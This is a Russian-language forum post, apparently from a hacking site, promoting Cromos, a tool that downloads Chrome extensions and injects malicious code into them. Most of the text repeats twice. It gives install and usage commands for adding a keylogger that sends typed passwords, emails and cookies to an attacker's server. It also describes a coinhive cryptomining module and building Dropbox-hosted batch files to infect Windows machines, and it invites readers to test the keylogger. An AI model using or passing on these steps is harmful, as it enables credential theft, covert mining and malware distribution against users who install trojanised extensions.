И снова здравствуйте! Данный материал будет посвящен инструменту, позволяющему вносить изменения в расширения для браузера, наделяя их недокументированными возможностями.
Cromos - это инструмент для загрузки расширений из интернет-магазина Chrome и инъекции в них своего кода. Есть возможность создания собственных исполняемых файлов и функция размещения файлов в Dropbox.
Функционал:
· Загрузка расширения
· Инъекция кода
· Загрузка файлов в Dropbox
· Заражение ОС семейства Windows
Установка:
> git clone https://github.com/fbctf/cromos
> cd /cromos
> pip install –r requirements.txt
> python setup.py
Справка:
> ./cromos.py –h
Использование:
· Скачиваем подходящее расширение из маркета, предварительно узнав его ID.
> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb
Я использовал QR code scanner.
· Скачиваем нужное расширение и дополняем его установкой модуля keylogger.
> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger
Подходящего сервера для требований кейлоггера, у меня сейчас нет, так, что проверить его работу не смогу. Надеюсь, кто-то в комментариях протестирует и отпишется.
Модифицированное расширение, можно найти здесь:
Создание пакетного файла и загрузка его в Dropbox:
> python cromos.py --extension {id} --build {bat} --token {dropboxToken}
Модули:
· modules/keylogger - Этот модуль фиксирует все пароли, которые вы вводите в зараженном браузере через https или нет. Все, что вам нужно, это иметь, например php-сервер, для получения: данных электронной почты, пароли, файлы cookie и userAgent.
· modules/currency – Модуль майнинга криптовалют. Необходима учетная запись – coinhive.
Небольшой ролик, по использованию инструмента от разработчиков:
>
На этом можно завершить. Спасибо за уделенное внимание.
Cromos - это инструмент для загрузки расширений из интернет-магазина Chrome и инъекции в них своего кода. Есть возможность создания собственных исполняемых файлов и функция размещения файлов в Dropbox.
Функционал:
· Загрузка расширения
· Инъекция кода
· Загрузка файлов в Dropbox
· Заражение ОС семейства Windows
Установка:
> git clone https://github.com/fbctf/cromos
> cd /cromos
> pip install –r requirements.txt
> python setup.py
Справка:
> ./cromos.py –h
Использование:
· Скачиваем подходящее расширение из маркета, предварительно узнав его ID.
> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb
Я использовал QR code scanner.
· Скачиваем нужное расширение и дополняем его установкой модуля keylogger.
> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger
Подходящего сервера для требований кейлоггера, у меня сейчас нет, так, что проверить его работу не смогу. Надеюсь, кто-то в комментариях протестирует и отпишется.
Модифицированное расширение, можно найти здесь:
Создание пакетного файла и загрузка его в Dropbox:
> python cromos.py --extension {id} --build {bat} --token {dropboxToken}
Модули:
· modules/keylogger - Этот модуль фиксирует все пароли, которые вы вводите в зараженном браузере через https или нет. Все, что вам нужно, это иметь, например php-сервер, для получения: данных электронной почты, пароли, файлы cookie и userAgent.
· modules/currency – Модуль майнинга криптовалют. Необходима учетная запись – coinhive.
Небольшой ролик, по использованию инструмента от разработчиков:
>
Ссылка скрыта от гостей
На этом можно завершить. Спасибо за уделенное внимание.
